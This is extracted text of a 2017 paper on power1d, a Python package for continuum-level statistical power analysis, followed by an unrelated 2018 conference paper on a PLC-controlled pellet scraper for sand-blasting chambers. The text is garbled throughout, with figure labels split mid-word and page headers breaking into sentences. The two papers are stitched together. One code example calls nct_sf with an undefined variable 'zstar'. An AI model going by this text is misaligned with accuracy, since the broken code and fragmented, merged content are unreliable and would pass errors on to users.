Since test statistic continua can be numerically generated in this manner for arbitrary DataSample and Experiment models, it follows that power analysis can be numerically conducted by comparing two experiment models, one representing the null hypothesis (which contains null signal) and one representing the alternative hypothesis (which contains the signal one wishes to detect). power1d provides a high-level interface to that two-experiment comparison through its ExperimentSimulator object as demonstrated below: J = 5 Q = 101 baseline = power1d.geom.Null( Q ) signal0 = power1d.geom.Null( Q ) signal1 = power1d.geom.GaussianPulse( Q , q=60 , fwhm=30, amp=2 ) noise = power1d.noise.Gaussian( J , Q , mu=0 , sigma=1 ) model0 = power1d.models.DataSample( baseline , signal0 , noise , J=J ) model1 = power1d.models.DataSample( baseline , signal1 , noise , J=J ) teststat = power1d.stats.t_1sample emodel0 = power1d.models.Experiment( model0 , teststat ) Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 12/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0 20 40 60 80 100 Continuum position 0 5 10 15 20 Te st s ta tis tic v al ue Figure 11 Test statistic continua generated using an Experiment model (50 iterations). emodel1 = power1d.models.Experiment( model1 , teststat ) sim = power1d.ExperimentSimulator( emodel0 , emodel1 ) results = sim.simulate( 10000 ) results.plot() Note that the emodel0 and emodel1 objects represent null and a Gaussian pulse signal, respectively, and thus represent the null and alternative hypotheses, respectively. The Monte Carlo simulation proceeds over 10,000 iterations (triggered by the simulate command) and completes for this example in approximately 2.2 s. The final results.plot command produces the results depicted in Fig. 12. In this example the omnibus power is 0.92 (Fig. 12A), implying that the probability of rejecting the null at at least one continuum location is 0.92. This omnibus power should be used when the hypothesis pertains to the entire continuum because it embodies whole-continuum-level control of both false negatives and false positives. While the omnibus power is greater than 0.9, the point-of-interest (POI) and center- of-interest (COI) powers are both well below 0.8 (Fig. 12C ); see the Fig. 12 caption for a description of POI and COI powers. The POI power should be used if one’s hypothesis pertains to a single continuum location. The COI power should be used if the scope of the hypothesis is larger than a single point but smaller than the whole continuum. Overall these results imply that, while the null hypothesis will be rejected with high power, it will not always be rejected in the continuum region which contains the modeled signal (i.e., roughly between continuum positions 40 and 80). This simple model thus highlights the following continuum-level power concepts: Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 13/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0 20 40 60 80 100 Continuum position 2 0 2 4 Co nt in uu m v al ue (A) Null --- P(reject)=0.050 Alternative --- P(reject)=0.920 0 20 40 60 80 100 Continuum position 0.0 0.2 0.4 0.6 0.8 1.0 Po w er Null power continua (B) POI power COI power (radius=3) Power datum 0 20 40 60 80 100 Continuum position 0.0 0.2 0.4 0.6 0.8 1.0 Alternative power continua (C) Figure 12 Example power1d results (α = 0.05). (A) depicts the two experiment models and the om- nibus power (p = 0.920). (B, C) depict power continua (B: null model, C: alternative model). The point- of-interest (POI) continuum indicates the probability of null hypothesis rejection at each continuum point. The center-of-interest (COI) continuum depicts the same but expands the search area to a cer- tain radius surrounding the POI, in this case with an arbitrary radius of three. Thus the omnibus power is equivalent to the maximum COI power when the COI radius is Q (i.e., the full continuum size). The in- tegral of the POI power continuum for the null model is α. Powers of 0, 0.8 and 1 are displayed as dotted lines for visual reference. • Continuum-level signals can be modeled with arbitrary geometry. • Continuum-level omnibus power does not necessarily pertain to the modeled signal. • The investigator must specify the scope of the hypothesis in an a priori manner (i.e., single point, general region or whole-continuum) and use the appropriate power value (i.e., POI, COI or omnibus, respectively). The model depicted in Fig. 12 is simple, and similar results could be obtained analytically by constraining the continuum extent of noncentral RFT inferences (Hayasaka et al., 2007). The advantages of numerical simulation are thus primarily for situations involving arbitrary complexities including but not limited to: multiple, possibly interacting signals, signal-dependent noise, covariate-dependent noise, unequal sample sizes, non-sphericity, etc. All of these complexities introduce analytical difficulties, but all are easily handled within power1d’s numerical framework. Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 14/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 Regions of interest (power1d.roi) The final functionality supported in power1d is hypothesis constraining via region of interest (ROI) continua. In practical applications, even when complete continua are recorded, one’s hypothesis does not necessarily relate to the whole continuum. For example, the Canadian temperature example (Fig. 1) depict daily values collected for the whole year, but one’s hypothesis might pertain only to the summer months (approximately days 150–250). In this case it is probably most practical to model the entire year, but constrain the hypothesis to a certain portion of it as follows: data = power1d.data.weather() y = data[ " Continental " ] baseline = power1d.geom.Continuum1D( y.mean ( axis=0 ) ) signal0 = power1d.geom.Null( Q ) signal1 = power1d.geom.GaussianPulse( Q , q=200 , amp=6 , fwhm=100 ) n0 = power1d.noise.Gaussian( J , Q , mu=0 , sigma=0.3 ) n1 = power1d.noise.SmoothGaussian( J , Q , mu=0 , sigma=5 , fwhm=70 ) noise = power1d.noise.Additive( n0 , n1 ) model0 = power1d.models.DataSample( baseline , signal0 , noise , J=J ) model1 = power1d.models.DataSample( baseline , signal1 , noise , J=J ) teststat = power1d.stats.t_1sample emodel0 = power1d.models.Experiment( model0 , teststat ) emodel1 = power1d.models.Experiment( model1 , teststat ) sim = power1d.ExperimentSimulator( emodel0 , emodel1 ) results = sim.simulate( 10000 ) roi = np.array( [ False ] * Q ) roi[ 150 : 250 ] = True results.set_roi( roi ) results.set_coi_radius( 50 ) results.plot() The code above models a maximum temperature increase of six degrees on Day 200 as a Gaussian pulse with an FWHM of 100 days, and constrains the hypothesis to Days 150–250 via the set_roi method. The results in Fig. 13 depict the ROI as blue background window and suggest that the omnibus power is close to 0.8. Setting the COI radius to the ROI radius of 50 via the set_coi_radius method emphasizes that the COI power continuum’s maximum is the same as the omnibus power. Also note that, had an ROI not been set, the ROI is implicitly the entire continuum, in which case the omnibus power would have been Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 15/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0 100 200 300 Continuum position 30 20 10 0 10 20 30 Co nt in uu m v al ue (A) Null --- P(reject)=0.050 Alternative --- P(reject)=0.765 0 100 200 300 Continuum position 0.0 0.2 0.4 0.6 0.8 1.0 Po w er Null power continua (B) POI power COI power (radius=50) Power datum 0 100 200 300 Continuum position 0.0 0.2 0.4 0.6 0.8 1.0 Alternative power continua (C) Figure 13 Example region of interest (ROI)-constrained power results (α = 0.05). Note that an COI radius of 365 would raise the null COI power continuum to α. (A) depicts the two experiment models and the omnibus power (p=0.765). (B, C) depict power continua (B: null model, C: alternative model). considerably lower at 0.586. This emphasizes the fact that the critical threshold must be raised as the continuum gets larger in order to control for omnibus false positives across the continuum. These analyses, involving a more complex additive noise model and 10,000 iterations, required approximately 15 s on a standard desktop PC. VALIDATIONS 0D power power1d can be used for standard 0D (scalar) power assessments by setting an ROI object to a single continuum point as follows. First set values for the main power-relevant parameters: alpha = 0.05 J = 12 effect = 0.8 df = J - 1 delta = effect * J ** 0.5 where alpha, df and delta are the Type I error rate, degrees of freedom and noncentrality parameter, respectively. Next compute power analytically: Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 16/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 from scipy import stats u = stats.t.isf( alpha , df ) p = stats.nct.sf( u , df , delta ) where u is the critical threshold and where the power is p=0.829. To replicate this in power1d one must create a model which replicates the assumptions underlying the analytical calculation above. In the code below a continuum size of Q=2 is used because that is the minimum size that power1d supports. Q = 2 baseline = power1d.geom.Null( Q ) signal0 = power1d.geom.Null( Q ) signal1 = power1d.geom.Constant( Q , amp=effect ) noise = power1d.noise.Gaussian( J , Q , mu=0 , sigma=1 ) model0 = power1d.DataSample( baseline , signal0 , noise , J=J ) model1 = power1d.DataSample( baseline , signal1 , noise , J=J ) Last, simulate the modeled experiments and numerically estimate power: teststat = power1d.stats.t_1sample emodel0 = power1d.models.Experiment( model0 , teststat ) emodel1 = power1d.models.Experiment( model1 , teststat ) sim = power1d.ExperimentSimulator( emodel0 , emodel1 ) results = sim.simulate( 1000 ) roi = np.array( [ True , False ] ) results.set_roi( roi ) p = results.p_reject1 Here power is given by the p_reject1 attribute of the simulation results (i.e., the probability of rejecting the null hypothesis in alternative experiment given the null and alternative models) and in this case the power is estimated as p=0.835. Increasing the number of simulation iterations improves convergence to the analytical solution. Repeating across a range of sample and effect sizes yields the results depicted in Fig. 14. This power1d interface for computing 0D power is admittedly verbose. Nevertheless, as a positive point power1d’s interface emphasizes the assumptions that underly power computations, and in particular the nature of the signal and noise models. 1D power: inflated variance method The inflated variance method (Friston et al., 1996) models signal as a Gaussian continuum with a particular smoothness and particular variance. power1d does not support random signal modeling, but the inflated variance model can nevertheless be modeled using alternative noise models as demonstrated below. First all power-relevant parameters are set: J = 20 Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 17/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0.2 0.4 0.6 0.8 1.0 Effect size 0.2 0.4 0.6 0.8 1.0 Po w er J = 5 J = 10 J = 25 Figure 14 Validation of power1d’s 0D power calculations. Solid lines depict theoretical solutions from the noncentral t distribution and dots depict power1d’s numerically simulated results (1,000 iterations each). Q = 201 df = J - 1 alpha = 0.05 W0 = 20 W1 = 10.0 sigma = 2.0 Here W0 and W1 are the continuum smoothness values under the null and alternative hypotheses, respectively, and sigma is the effect size as the standard deviation of the ‘signal’ (i.e., noise) under the alternative. Next the critical RFT threshold can be computed using power1d’s inverse survival function following Friston et al. (1996) (Eqn. 5, p. 226) as follows: u = power1d.prob.t_isf( alpha , df , Q , W0 ) Next the smoothness and threshold parameters are transformed according to Friston et al. (1996) (Eqns. 8–9, p. 227): s2 = sigma f = float( W1 ) / W0 Wstar = W0 * ( ( 1 + s2 ) / (1 + s2 / ( 1 + f ** 2 ) ) ) ** 0.5 ustar = u * ( 1 + s2 ) ** -0.5 Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 18/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 Here s2 is the variance and f is the ratio of signal-to-noise smoothness. The probability of rejecting the null hypothesis when the alternative is true is given as the probability that random fields with smoothness W∗ will exceed the threshold u∗ (Wstar and ustar, respectively), and where that probability can be computed using the standard RFT survival function: p = power1d.prob.t_sf( ustar , df , Q , Wstar ) Here the analytical power is p=0.485. Validating this analytical power calculation in power1d can be achieved using a null signal and two different noise models as follows: baseline = power1d.geom.Null( Q=Q ) signal = power1d.geom.Null( Q=Q ) SG = power1d.noise.SmoothGaussian n0 = SG( Q=Q , sigma=1.0 , fwhm=W0 , J=J ) n1 = SG( Q=Q , sigma=1.0 , fwhm=Wstar , J=J ) model0 = power1d.models.DataSample( baseline , signal , n0 , J=J ) model1 = power1d.models.DataSample( baseline , signal , n1 , J=J ) teststat = power1d.stats.t_1sample emodel0 = power1d.Experiment( model0 , teststat ) emodel1 = power1d.Experiment( model1 , teststat ) sim = power1d.ExperimentSimulator( emodel0 , emodel1 ) results = sim.simulate( 1000 ) p = results.sf( ustar ) The numerically estimate power is p=0.492, which is reasonably close to the analytical probability of 0.485 after just 1,000 iterations. Repeating for background noise smoothness values of 10, 20 and 50, sample sizes of 5, 10 and 25 and effect sizes ranging from σ =0.5 to 2.0 yields the results depicted in Fig. 15. Close agreement between the theoretical and simulated power results is apparent. As noted by Hayasaka et al. (2007) powers are quite low for the inflated variance approach because the signal is not strong; the ‘signal’ is effectively just a different type of noise. The noncentral RFT approach described in the next section addresses this limitation. 1D power: noncentral RFT method The noncentral RFT method models signal as a constant continuum shift (Hayasaka et al., 2007). Like the inflated variance method above, it can by computed analytically in power1d by first defining all power-relevant parameters: Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 19/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0.50 0.75 1.00 1.25 1.50 1.75 2.00 Effect size ( ) 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 Po w er (A) FWHM = 10 J = 5 J = 10 J = 25 0.50 0.75 1.00 1.25 1.50 1.75 2.00 Effect size ( ) 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 (B) FWHM = 20 0.50 0.75 1.00 1.25 1.50 1.75 2.00 Effect size ( ) 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 (C) FWHM = 50 Figure 15 Validation results for the inflated variance approach to 1D power. Solid lines depict theo- retical solutions from the noncentral random field theory and dots depict power1d’s numerically simu- lated results (10,000 iterations each). J represents sample size and FWHM represents the smoothness of the background noise process. (A) FWHM=10, (B) FWHM=20, (C) FWHM=50. J = 8 Q = 201 W = 40.0 df = J - 1 alpha = 0.05 effect = 0.8 delta = effect * J ** 0.5 where delta is the noncentrality parameter. Next power can be be computed via noncentral RFT (Hayasaka et al., 2007; Mumford & Nichols, 2008; Joyce & Hayasaka, 2012) as follows: u = power1d.prob.t_isf( alpha , df , Q , W ) p = power1d.prob.nct_sf( zstar , df , Q , W , delta ) Here u is the critical threshold and nct_sf is RFT’s noncentral t survival function. The analytical power is p=0.731. Next, similar to the 0D validation above, power1d can be used to validate this analytical power by constructing signal and noise objects as indicated below. Note that the signal is Constant (Fig. 5), as assumed by the noncentral RFT method. baseline = power1d.geom.Null( Q ) signal0 = power1d.geom.Null( Q ) signal1 = power1d.geom.Constant( Q , amp=effect ) n = power1d.noise.SmoothGaussian( J , Q , mu=0 , sigma=1 , fwhm=W ) model0 = power1d.DataSample( baseline , signal0 , n , J=J ) model1 = power1d.DataSample( baseline , signal1 , n , J=J ) Last, simulate the modeled experiments and numerically estimate power: teststat = power1d.stats.t_1sample emodel0 = power1d.models.Experiment( model0 , teststat ) emodel1 = power1d.models.Experiment( model1 , teststat ) sim = power1d.ExperimentSimulator( emodel0 , emodel1 ) Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 20/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0.1 0.2 0.3 0.4 0.5 0.6 0.7 Effect size 0.2 0.4 0.6 0.8 1.0 Po w er (A) FWHM = 10 J = 5 J = 10 J = 25 0.1 0.2 0.3 0.4 0.5 0.6 0.7 Effect size 0.2 0.4 0.6 0.8 1.0 (B) FWHM = 20 0.1 0.2 0.3 0.4 0.5 0.6 0.7 Effect size 0.2 0.4 0.6 0.8 1.0 (C) FWHM = 50 Figure 16 Validation results for the noncentral random field theory approach to 1D power. Solid lines depict theoretical solutions from the noncentral random field theory and dots depict power1d’s numeri- cally simulated results (10,000 iterations each). FWHM and J represent continuum smoothness and sam- ple size, respectively. (A) FWHM=10, (B) FWHM=20, (C) FWHM=50. results = sim.simulate( 1000 ) p = results.p_reject1 Here the numerically estimated power is p=0.747, which is again similar to the analytical probability of p=0.731 after just 1,000 iterations. Repeating for smoothness values of 10, 20 and 50, sample sizes of 5, 10 and 25 and effect sizes ranging from 0.1 to 0.7 yields the results depicted in Fig. 16. Agreement between the theoretical and numerically simulated powers is reasonable except for large effect sizes and intermediate sample sizes (Fig. 16C, J =25). Since theoretical and simulated results appear to diverge predominantly for high powers these results suggest that the noncentral RFT approach is valid in scenarios where powers of approximately 0.8 are sought for relatively small sample sizes. While the noncentral RFT approach has addressed the low-power limitation of the inflated variance method (Fig. 15), its ‘signal’ is geometrically simple in the form of a mean shift. Clearly other, more complex signal geometries may be desirable. For example, in the context of the Canadian temperature data (Fig. 1) one may have a forward dynamic model which predicts regional temperatures through region-specific parameters such as land formations, foliage, wind patterns, proximity to large bodies of water and atmospheric carbon dioxide. Forward models like those can be used to generate specific continuum predictions based on, for example, increases in atmospheric carbon dioxide. Those continuum predictions are almost certainly not simple signals like the ones represented by the inflated variance and noncentral RFT methods. Therefore, when planning an experiment to test continuum-level predictions, and specifically when determining how many continuum measurements are needed to achieve a threshold power, the numerical simulation capabilities of power1d may be valuable. COMPARISON WITH OTHER SOFTWARE PACKAGES Power calculations for 0D (scalar) data are available in most commercial and open-source statistical software packages. Many of those offer limited functionality in that most are limited to the noncentral t distribution, and many have vague user interfaces in terms of experimental design. Some also offer an interface to noncentral F computations, but nearly all have limited capabilities in terms of design. Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 21/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 The most comprehensive and user-friendly software package for computing power is G-power (Faul et al., 2007). In addition to the standard offerings of noncentral t computations, G-power also offers noncentral distributions for F, χ2 and a variety of other test statistics. It has an intuitive graphical user interface that is dedicated to power-specific questions. However, in the context of this paper G-power is identical to common software packages in that its power calculations are limited to 0D (scalar) data. Two software packages dedicated to continuum-level power assessments, and those most closely related to power1d are: 1. PowerMap (Joyce & Hayasaka, 2012). 2. fmripower (Mumford & Nichols, 2008). Both PowerMap and fmripower are designed specifically for continuum-level power analysis, and both extend the standard noncentral t and F distributions to the continuum domain via RFT. They have been used widely in the field of Neuroimaging for planning brain imaging experiments and they both offer graphical interfaces with a convenient means of incorporating piiot data into guided power analyses. However, both are limited in terms of the modeled signals they offer. RFT’s noncentral t and F distributions model ‘signal’ as a whole-continuum mean displacement, which is geometrically simple relative to the types of geometries that are possible at the continuum level (see the ‘Software Implementation: Geometry section above). PowerMap and fmripower somewhat overcome the signal simplicity problem through continuum region constraints, where signal is modeled in some regions and not in others in a binary sense. This approach is computationally efficient but is still geometrically relatively simple. A second limitation of both packages is that they do not support numerical simulation of random continua. This is understandable because it is computationally infeasible to routinely simulate millions or even thousands of the large-volume 3D and 4D random continua that are the target of those packages’ power assessments. Consequently neither PowerMap nor fmripower supports arbitrary continuum signal modeling. As outlined in the examples above power1d replicates the core functionality of PowerMap and fmripower for 1D continua. It also offers functionality that does not yet exist in any other package: arbitrary continuum-level signal and noise modeling and associated computational power analysis though numerical simulation of random continua. This functionality greatly increases the flexibility with which one can model one’s data, and allows investigators to think about the signal and noise in real-world units, without directly thinking about effect sizes and effect continua. SUMMARY This paper has described a Python package called power1d for estimating power in experiments involving 1D continuum data. Its two main features include (a) analytical continuum-level power calculations based on random field theory (RFT) and (b) computational power analysis via continuum-level signal and noise modeling. Numerical simulation is useful for 1D power analysis because 1D continuum signals can adopt arbitrary and non-parameterizable geometries. This study’s cross-validation results show Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 22/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 that power1d’s numerical estimates closely follow theoretical solutions, and also that its computational demands are not excessive, with even relatively complex model simulations completing in under 20 s. Since power1d accommodates arbitrary signals, arbitrary noise models and arbitrarily complex experimental designs it may be a viable choice for routine yet flexible power assessments prior to 1D continuum experimentation. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Wakate A Grant 15H05360 from the Japan Society for the Promotion of Science. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: Japan Society for the Promotion of Science: 15H05360. Competing Interests The author declares there are no competing interests. Author Contributions • Todd C. Pataky conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, wrote the software and its documentation. Data Availability The following information was supplied regarding data availability: All code, including scripts to replicate the paper’s results, are available at http: //www.spm1d.org/power1d. REFERENCES Adler R, Hasofer A. 1976. Level crossings for random fields. The Annals of Probability 4(1):1–12 DOI 10.1214/aop/1176996176. Continuum Analytics. 2017. Anaconda: leading open data science platform powered by Python. https://www.continuum.io/anaconda-overview. Faul F, Erdfelder E, Lang A-G, Buchner A. 2007. G*Power 3: a flexible statistical power analysis program for the social, behavioral, and biomedical sciences. Behavior Research Methods 39(2):175–191 DOI 10.3758/BF03193146. Friston K, Worsley K, Frackowiak R, Mazziotta J, Evans A. 1994. Assessing the significance of focal activations using their spatial extent. Human Brain Mapping 1(3):210–220 DOI 10.1002/hbm.460010306. Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 23/24 https://peerj.com http://www.spm1d.org/power1d http://www.spm1d.org/power1d http://dx.doi.org/10.1214/aop/1176996176 https://www.continuum.io/anaconda-overview http://dx.doi.org/10.3758/BF03193146 http://dx.doi.org/10.1002/hbm.460010306 http://dx.doi.org/10.7717/peerj-cs.125 Friston KJ, Ashburner JT, Kiebel SJ, Nichols TE, Penny WD. 2007. Statistical paramet- ric mapping: the analysis of functional brain images. London: Elsevier. Friston KJ, Holmes A, Poline JB, Price CJ, Frith CD. 1996. Detecting activations in PET and fMRI: levels of inference and power. NeuroImage 4(3):223–235 DOI 10.1006/nimg.1996.0074. Hasofer AM. 1978. Upcrossings of random fields. Advances in Applied Probability 10:14–21 DOI 10.1017/S0001867800029426. Hayasaka S, Peiffer AM, Hugenschmidt CE, Laurienti PJ. 2007. Power and sample size calculation for neuroimaging studies by non-central random field theory. NeuroImage 37(3):721–730 DOI 10.1016/j.neuroimage.2007.06.009. Hunter JD. 2007. Matplotlib: a 2D graphics environment. Computing in Science and Engineering 9(3):90–95. Jones E, Oliphant T, Peterson P. 2001. SciPy: open source scientific tools for python. Available at http://www.scipy.org/ . Joyce KE, Hayasaka S. 2012. Development of PowerMap: a software package for statis- tical power calculation in neuroimaging studies. Neuroinformatics 10(4):351–365 DOI 10.1007/s12021-012-9152-3. Kiebel S, Poline J, Friston K, Holmes A, Worsley K. 1999. Robust smoothness estima- tion in statistical parametric maps using standardized residuals from the general linear model. NeuroImage 10(6):756–766 DOI 10.1006/nimg.1999.0508. Mumford J, Nichols TE. 2008. Power calculation for group fMRI studies accounting for arbitrary design and temporal autocorrelation. NeuroImage 39(1):261–268 DOI 10.1016/j.neuroimage.2007.07.061. Nichols T, Holmes A. 2002. Nonparametric permutation tests for functional neuroimaging: a primer with examples. Human Brain Mapping 15(1):1–25 DOI 10.1002/hbm.1058. Pataky TC. 2016. rft1d: smooth one-dimensional random field upcrossing probabilities in python. Journal of Statistical Software 71(7):1–22. Ramsay JO, Silverman BW. 2005. Functional data analysis. New York: Springer-Verlag. Van der Walt S, Colbert SC, Varoquaux G. 2011. The NumPy array: a structure for efficient numerical computation. Computing in Science and Engineering 13:22–30. Van Rossum G. 2014. The python library reference release 2.7.8. Available at https: //docs.python.org/2/library/ . Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 24/24 https://peerj.com http://dx.doi.org/10.1006/nimg.1996.0074 http://dx.doi.org/10.1017/S0001867800029426 http://dx.doi.org/10.1016/j.neuroimage.2007.06.009 http://www.scipy.org/ http://dx.doi.org/10.1007/s12021-012-9152-3 http://dx.doi.org/10.1006/nimg.1999.0508 http://dx.doi.org/10.1016/j.neuroimage.2007.07.061 http://dx.doi.org/10.1002/hbm.1058 https://docs.python.org/2/library/ https://docs.python.org/2/library/ http://dx.doi.org/10.7717/peerj-cs.125 work_z3zhgzbn6bfgrf7trxjp34j5da ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 77 Design of Pellet Recycle Scraper System in Sand-Blasting Chamber Wang Baoli Bombardier Sifang (Qingdao) Transportation Ltd Shandong 266111, China Wang Junli Bombardier Sifang (Qingdao) Transportation Ltd Shandong 266111,China Zhao Zhipeng Bombardier Sifang (Qingdao) Transportation Ltd Shandong 266111, China e-mail: 760907040@qq.com Abstract—In the process of industrial sand-blasting, it is necessary to recycle the pellet. In order to solve the existing problems such as high cost, vulnerability, maintenance difficulty and low recycle efficiency in pneumatic recycling system and mechanical recycling system of pellet, we designed a trapezoidal scraper recycle system of pellet which powered by the cylinder and controlled by PLC to realize the pellet collection. The core component of the system is the scraper mechanical structure which mainly composed of scraper, scraper cylinder, baffle, scraper frame, bearing. This design has the advantages such as simple structure, resistant to breakdown, easy dismantlement. By installing pneumatic valve on the cylinder, the sand scraping speed can be adjusted. The trapezoidal scraper pellet recycling system efficiency is much higher after the contrast experiments between trapezoidal scraper and mechanical screw conveyor of the original equipment. Keywords-Pellet; Cylinder; PLC; Scraper; Trapezoid I. INTRODUCTION In order to improve the adhesion of the surface paint, it is necessary to sand-blast on the workpiece. During the sand-blasting process, pellet need to be recycled for the purpose of cost reduction [1-2]. At present, pneumatic recycling system [3] and mechanical recycling system [4-5] are widely used in our country for pellet recycle. However, problems such as high cost, vulnerability and maintenance difficulty still exist. Therefore, it is overwhelming important to design a recycle system for pellet of low cost, resistance to breakdown and easy maintenance. II. PELLET RECYCLE SYSTEM Scraper-typed pellet recycle system [6] designed by this design is mainly composed of 2 rod, 3 scraper, 5 cylinder, 6 pellet-collect container and so on. As shown in Figure 1, 1 is trench, 4 is air rod and 7 is pellet material. The air rod is fixedly connected with the pull rod. Numerous scrapers with the same structure are fixedly connected with the pull rod. The scraper has the function of one-way reversing. When the air rod is retracted, the scraper will move the pellet material to the material collecting container. When the air rod is stretched out, the scraper will flip without pushing pellet, so that pellet will achieve a cycle of directional movement. By installing pneumatic valve on the cylinder, air rod speed can be adjusted. 1 7 2 3 4 5 6 Figure 1. Scraper pellet recycle system III. MECHANICAL SYSTEM DESIGN A. Scraper structure The core component of the material recycle system is the scraper. For the scraper system designed in this design as shown in Fig. 2, Fig. 3, Fig. 4, Fig. 5, 1 is trench, 7 is the pellet material. The physical map is shown in Figure 3-4. Scraper system is mainly composed of 2 bearing mounting plates, 3 scraper frame, 4 vertical bearing, 5 lateral bearing, 6 scraper, 8 baffle, 9 bayonet and 10 scraper cylinder as shown in Figure 3-1 and Figure 3-2. Scraper and scraper cylinder are in dynamic connection, with functions such as one-way flip and reverse scraping. The basic scraper structure is trapezoidal. The role of bayonet is to constrain the freedom for scraper up and down. The surface of the scraper frame is fixedly connected with the scraper cylinder and the baffle. Lateral bearing and vertical bearing are cross-typed with functions of guiding and undertaking weight respectively as shown in Figure 3-3. Lateral bearing and vertical bearing are mounted on the bearing mounting plate. Bearing mounting plate is fixedly installed on the inner wall of the trench. One end of the scraper frame is fixedly connected with the air rod. The pneumatic control valves and proximity switch are mounted onto the air cylinder. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 78 1 A A 2 3 4 5 6 7 10 9 8 I Figure 2. Scraper system 10 6 9 8 7 3 Figure 3. A-A directional view 3 4 2 5 8 Figure 4. I partial view Figure 5. Physical map of trapezoidal scraper B. Scraper’s working theory Once the scraper-typed pellet recycle is started, the scraper frame will move the trapezoid scraper forward and backward by scraper cylinder. When the scraper moves forward, the scraper will push the pellet forward due to the pulling force of the air cylinder and the blocking effect of the baffle up on the scraper. When the scraper moves backward, the baffle won’t have blocking effect on the scraper, the scraper rotates around the scraper cylinder under the reaction force of the pellet on the ground, it won’t push the pellet material. With such a reciprocating rhyme, directional movement of pellet material can be completed as well as pellet will be collected. Pneumatic valve can adjust the air rod running speed according to the current situation, hence adjust the scraping pellet speed by scraper. C. Scraper performance analysis  The scraper major components are cylinder, scraper, scraper frame, bearing and so on. It has advantages such as simple structure, low cost, easy dismantlement.  This design uses trapezoidal scraper and make full use of the trench surface to supervise the height of pellet piled in case it affects scraper flip. Its influence is most obvious when the width of trench is small.  The bearings are distant from the ground, which can prevent the accumulation of pellet from damaging the bearings to reduce the maintenance times.  The pneumatic speed control valve is installed onto the cylinder so the scraper speed can be reduced when there are fewer pellet, which can reduce scraper loss. IV. ELECTRICAL SYSTEM DESIGN According to requirements of the system, this design uses Siemens S7-200 PLC to control the scraper. This product is cheap, powerful with great practicality. PLC I/O allocation table is shown in Table 1. Its external wiring diagram is shown in Fig 6. Proximate to the switch, PLC detects the position of the air rod and controls direction change of the cylinder through solenoid valve. When the air rod fails to change direction, the PLC will stop and give alarms [7-8]. TABLE I. PLC I/O ALLOCATION Input Output Input component Address Output component Address SB1, start I0 Y1, cylinder out Q0 SB2, stop I1 Y2, cylinder contraction Q1 SQ1, cylinder stretched out until the position of test I2 BJ1, warning light Q2 SQ2, cylinder contracted until the position of test I3 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 79 SB1 SB2 SQ1 SQ2 Y1 Y2 BJ1 COM I0 I1 I2 I3 Q0 Q1 Q2 DC24V +24V 0V Figure 6. Schema of electrical control V. EFFICIENCY COMPARISON BETWEEN TRAPEZOIDAL SCRAPER AND MECHANICAL PELLET CECYCLE SYSTEM In this design, trapezoidal scraper and the original mechanical screw conveyor pellet recycling efficiencies are compared. The same amount of pellet are placed in two ditches. With both systems under the best operating efficiency, statistics of recycle time will be collected according to 5 kg, 10 kg and 15 kg pellet. The result is shown in Table 2. TABLE II. PELLET RECOVERY TIME Recycled pellet quality (kg) Pellet recovery time(hour) Screw conveyor Trapezoidal scraper 5 0.51 0.30 10 1.11 0.62 15 1.56 0.89 Data show that under the same condition, the time required to complete the 5 kg, 10 kg, 15 kg recycle by trapezoidal scraper is significantly less than that of the mechanical screw conveyor thus prove that the trapezoidal scraper pellet recycle system efficiency is much higher. VI. CONCLUSION Scraped pellet recycle system is proposed in this design. It uses Siemens S7-200 PLC as the controller and it's core component is the trapezoidal scraper whose advantages are simple structure, resistance to breakdown and easy dismantlement. With comparison of experiments, it shows high efficiency in recycling pellet. Hence it is worthwhile of popularization. REFERENCES [1] Ye Yangxiang, Pan zhaoji. Application Manual for Coating Technology [M]. China Machine Press, 1997. [2] Yao Shoushan, Li Geyang, Hu wenbing. Surface Science and Technology [M]. China Machine Press, 2005. [3] Wang Xuefang. Analysis of Pneumatic Sand-Blasting System [J].Electric Power Locomotives and Urban Railway Vehicles, 2003, 26 (2): 30-32. [4] Wang Yongli. Application Examples by Sand-Blasting Machine in the Coating Line [J]. Modern Coatings, 2013, 16 (3): 27-33. [5] Liu Fugui. Research on Screw Conveyor Machine of Pellet [J]. Rolling Stock Workers, 2001 (11): 9-11. [6] Luan Xianyu, Liu Hongnan. Design of Blasting Chamber Scraper Recycle System Based on PLC [J]. Mechanical Engineers, 2014 (6): 158-159 [7] Liu Huabo. Siemens S7-200 PLC programming and application case selection [M]. China Machine Press, 2009. [8] Liao Changchu. S7-200 PLC programming and application [M]. China Machine Press, 2014 . 